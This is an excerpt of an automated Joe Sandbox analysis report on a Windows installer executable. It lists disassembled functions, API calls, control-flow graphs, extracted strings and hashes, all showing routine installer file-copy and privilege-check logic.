                                                                                                            • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$P$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                                            • API String ID: 0-934948074
                                                                                                            • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                                            • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                                                            • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                                                            • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1530 42dfc4-42dfd5 1531 42dfe0-42e005 AllocateAndInitializeSid 1530->1531 1532 42dfd7-42dfdb 1530->1532 1533 42e1af-42e1b7 1531->1533 1534 42e00b-42e028 GetVersion 1531->1534 1532->1533 1535 42e041-42e043 1534->1535 1536 42e02a-42e03f GetModuleHandleA GetProcAddress 1534->1536 1537 42e045-42e053 CheckTokenMembership 1535->1537 1538 42e06a-42e084 GetCurrentThread OpenThreadToken 1535->1538 1536->1535 1539 42e191-42e1a7 FreeSid 1537->1539 1540 42e059-42e065 1537->1540 1541 42e086-42e090 GetLastError 1538->1541 1542 42e0bb-42e0e3 GetTokenInformation 1538->1542 1540->1539 1545 42e092-42e097 call 4031bc 1541->1545 1546 42e09c-42e0af GetCurrentProcess OpenProcessToken 1541->1546 1543 42e0e5-42e0ed GetLastError 1542->1543 1544 42e0fe-42e122 call 402648 GetTokenInformation 1542->1544 1543->1544 1548 42e0ef-42e0f9 call 4031bc * 2 1543->1548 1557 42e130-42e138 1544->1557 1558 42e124-42e12e call 4031bc * 2 1544->1558 1545->1533 1546->1542 1547 42e0b1-42e0b6 call 4031bc 1546->1547 1547->1533 1548->1533 1559 42e13a-42e13b 1557->1559 1560 42e16b-42e189 call 402660 CloseHandle 1557->1560 1558->1533 1564 42e13d-42e150 EqualSid 1559->1564 1560->1539 1568 42e152-42e15f 1564->1568 1569 42e167-42e169 1564->1569 1568->1569 1572 42e161-42e165 1568->1572 1569->1560 1569->1564 1572->1560
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                                                            • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                                                            • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                                                            • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                                                            • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                            • API String ID: 2252812187-1888249752
                                                                                                            • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                                            • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                                                            • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                                                            • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1860 423c1c-423c50 1861 423c52-423c53 1860->1861 1862 423c84-423c9b call 423b78 1860->1862 1863 423c55-423c71 call 40b44c 1861->1863 1868 423cfc-423d01 1862->1868 1869 423c9d 1862->1869 1891 423c73-423c7b 1863->1891 1892 423c80-423c82 1863->1892 1870 423d03 1868->1870 1871 423d37-423d3c 1868->1871 1872 423ca3-423ca6 1869->1872 1873 423d60-423d70 1869->1873 1881 423fc1-423fc9 1870->1881 1882 423d09-423d11 1870->1882 1876 423d42-423d45 1871->1876 1877 4240aa-4240b8 IsIconic 1871->1877 1874 423cd5-423cd8 1872->1874 1875 423ca8 1872->1875 1879 423d72-423d77 1873->1879 1880 423d7b-423d83 call 4241a4 1873->1880 1887 423db9-423dc0 1874->1887 1888 423cde-423cdf 1874->1888 1883 423e06-423e16 call 423b94 1875->1883 1884 423cae-423cb1 1875->1884 1885 4240e6-4240fb call 424860 1876->1885 1886 423d4b-423d4c 1876->1886 1889 424162-42416a 1877->1889 1896 4240be-4240c9 GetFocus 1877->1896 1893 423d88-423d90 call 4241ec 1879->1893 1894 423d79-423d9c call 423b94 1879->1894 1880->1889 1881->1889 1890 423fcf-423fda call 4181f0 1881->1890 1897 423f23-423f4a SendMessageA 1882->1897 1898 423d17-423d1c 1882->1898 1883->1889 1899 423cb7-423cba 1884->1899 1900 423e2e-423e4a PostMessageA call 423b94 1884->1900 1885->1889 1910 423d52-423d55 1886->1910 1911 4240fd-424104 1886->1911 1887->1889 1902 423dc6-423dcd 1887->1902 1903 423ce5-423ce8 1888->1903 1904 423f4f-423f56 1888->1904 1909 424181-424187 1889->1909 1890->1889 1945 423fe0-423fef call 4181f0 IsWindowEnabled 1890->1945 1891->1909 1892->1862 1892->1863 1893->1889 1894->1889 1896->1889 1915 4240cf-4240d8 call 41f004 1896->1915 1897->1889 1906 423d22-423d23 1898->1906 1907 42405a-424065 1898->1907 1918 423cc0-423cc3 1899->1918 1919 423eb5-423ebc 1899->1919 1900->1889 1902->1889 1923 423dd3-423dd9 1902->1923 1924 423cee-423cf1 1903->1924 1925 423e4f-423e6f call 423b94 1903->1925 1904->1889 1934 423f5c-423f61 call 404e54 1904->1934 1927 424082-42408d 1906->1927 1928 423d29-423d2c 1906->1928 1907->1889 1930 42406b-42407d 1907->1930 1931 424130-424137 1910->1931 1932 423d5b 1910->1932 1921 424106-424119 call 4244e4 1911->1921 1922 42411b-42412e call 42453c 1911->1922 1915->1889 1956 4240de-4240e4 SetFocus 1915->1956 1938 423cc9-423cca 1918->1938 1939 423dde-423dec IsIconic 1918->1939 1940 423ebe-423ed1 call 423b24 1919->1940 1941 423eef-423f00 call 423b94 1919->1941 1921->1889 1922->1889 1923->1889 1943 423cf7 1924->1943 1944 423e1b-423e29 call 424188 1924->1944 1983 423e93-423eb0 call 423a94 PostMessageA 1925->1983 1984 423e71-423e8e call 423b24 PostMessageA 1925->1984 1927->1889 1952 424093-4240a5 1927->1952 1949 423d32 1928->1949 1950 423f66-423f6e 1928->1950 1930->1889 1947 42414a-424159 1931->1947 1948 424139-424148 1931->1948 1951 42415b-42415c call 423b94 1932->1951 1934->1889 1957 423cd0 1938->1957 1958 423da1-423da9 1938->1958 1964 423dfa-423e01 call 423b94 1939->1964 1965 423dee-423df5 call 423bd0 1939->1965 1989 423ee3-423eea call 423b94 1940->1989 1990 423ed3-423edd call 41ef68 1940->1990 1994 423f02-423f08 call 41eeb4 1941->1994 1995 423f16-423f1e call 423a94 1941->1995 1943->1951 1944->1889 1945->1889 1991 423ff5-424004 call 4181f0 IsWindowVisible 1945->1991 1947->1889 1948->1889 1949->1951 1950->1889 1971 423f74-423f7b 1950->1971 1979 424161 1951->1979 1952->1889 1956->1889 1957->1951 1958->1889 1973 423daf-423db4 call 422c5c 1958->1973 1964->1889 1965->1889 1971->1889 1982 423f81-423f90 call 4181f0 IsWindowEnabled 1971->1982 1973->1889 1979->1889 1982->1889 2005 423f96-423fac call 412320 1982->2005 1983->1889 1984->1889 1989->1889 1990->1989 1991->1889 2012 42400a-424055 GetFocus call 4181f0 SetFocus call 415250 SetFocus 1991->2012 2009 423f0d-423f10 1994->2009 1995->1889 2005->1889 2015 423fb2-423fbc 2005->2015 2009->1995 2012->1889 2015->1889
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                                            • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                                                            • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                                                            • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                                                            APIs
                                                                                                              • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                                                              • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                                                              • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                                              • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                                              • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                                              • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                                              • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                                                              • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                                              • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                                              • Part of subcall function 00493C7C: 73A1A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                                                              • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                                                              • Part of subcall function 00493C7C: 73A1A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                                                              • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0214D868,0214F4BC,?,?,0214F4EC,?,?,0214F53C,?), ref: 00467B3B
                                                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                                                              • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$AppendExtractIconObject$A480A570AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectSelectSendSystemUserWindow
                                                                                                            • String ID: $(Default)$STOPIMAGE
                                                                                                            • API String ID: 3271511185-770201673
                                                                                                            • Opcode ID: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                                            • Instruction ID: 7cc469b3bd63a428f44d838a58e066ff967143afc9c1970ffe4cf99f77f4ae1f
                                                                                                            • Opcode Fuzzy Hash: 37423c6cb51a93f280f9daeb0ce5abe33e3f8599bfcda42b6dea5e3f600f0df5
                                                                                                            • Instruction Fuzzy Hash: 9DF2C6386005148FCB00EB59D5D9F9973F1FF4A308F1542B6E5049B36ADB78AC4ACB8A
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 00473F61
                                                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047403E
                                                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00474072,?,?,0049B178,00000000), ref: 0047404C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID: unins$unins???.*
                                                                                                            • API String ID: 3541575487-1009660736
                                                                                                            • Opcode ID: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                                            • Instruction ID: 4fd1d9fbc71e550ec417509903356e65f0bc22e0d19a654d6a5f314750c2dfa9
                                                                                                            • Opcode Fuzzy Hash: 74e8728ae2360d7cc9e6142747c4e784bc21d11db711cb29493a318ee3c6f59d
                                                                                                            • Instruction Fuzzy Hash: 3D3163746001489FCB20EB65C981AEEB7BDDF84304F5184B6E50CAB2A2DB39DF458F58
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 004520FD
                                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452123,?,?,-00000001,00000000), ref: 00452105
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileFindFirstLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 873889042-0
                                                                                                            • Opcode ID: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                                            • Instruction ID: f9611aeb3029889b76a7ade8829495a9d918b249c8fbd3e45bbd36cd3e6629b4
                                                                                                            • Opcode Fuzzy Hash: 53d0b0f71413149149492da54f6d795d092e0f5f146a7a05654b1b551a70fbd2
                                                                                                            • Instruction Fuzzy Hash: 1DF04931A04604AB8B10DB6AAD0149FB7FCDB46725710467BFC14E3282EA784E088598
                                                                                                            APIs
                                                                                                            • GetVersion.KERNEL32(?,0046D1AE), ref: 0046D122
                                                                                                            • CoCreateInstance.OLE32(00498B64,00000000,00000001,00498B74,?,?,0046D1AE), ref: 0046D13E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateInstanceVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 1462612201-0
                                                                                                            • Opcode ID: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                                            • Instruction ID: 1e059e1ff20256b2d38cad76cdb56475a0db9ba99d2cbde6061077ac095a0934
                                                                                                            • Opcode Fuzzy Hash: 7e99c10d7870a2a4e40b689fd77bd4c1fbc398cb1ecae8ca6f7261d0d29e43fa
                                                                                                            • Instruction Fuzzy Hash: 56F0A7B0B40301DEEB10AB2ADD46B8B37C19713324F04413BB054962A0E7ED8880CB9F
                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                            • Instruction ID: d3b8e551ebd18b966166ca098383beb9494d3946d3c482517005b7019d2e894c
                                                                                                            • Opcode Fuzzy Hash: d9147d9d411e4ddcfbb477174297996358b0f3244354f1dc1cbfcde03a7bd03f
                                                                                                            • Instruction Fuzzy Hash: EEE0D87170021467D711A95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE8046ED
                                                                                                            APIs
                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,?,00424161,?,00000000,0042416C), ref: 00423BBE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NtdllProc_Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 4255912815-0
                                                                                                            • Opcode ID: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                                            • Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
                                                                                                            • Opcode Fuzzy Hash: b8a7fb1636f510e04679fc1c95d6034bf50f85873c956373ae04f9643015f65e
                                                                                                            • Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2645101109-0
                                                                                                            • Opcode ID: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                                            • Instruction ID: 76809c6cbed83fd478a986dc42ef3113a42af1b7be0c57f55a4460954ad8dcd3
                                                                                                            • Opcode Fuzzy Hash: b308eefd78fc34ccedab6b1389f53df2d3f8bc27a278cf7cb0c73ee59b873f37
                                                                                                            • Instruction Fuzzy Hash: 54D0CD7534430063C7006AA99C82597358C4784305F00443F7CC5DA2C3E5BDDA88565A
                                                                                                            APIs
                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042F3B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NtdllProc_Window
                                                                                                            • String ID:
                                                                                                            • API String ID: 4255912815-0
                                                                                                            • Opcode ID: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                                            • Instruction ID: f6c568c4939315a2eda578795105166964a56c952c5b5facb2271ccc97efa3bd
                                                                                                            • Opcode Fuzzy Hash: 463407ea8ab64360e41f6c039c0e682b96e3ddf2f94f44b918dd9fba9020941f
                                                                                                            • Instruction Fuzzy Hash: B8D05E7221010D6B8B00DE99D840C6F33AC9B88700BA08825F948C7205C634EC108BA4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
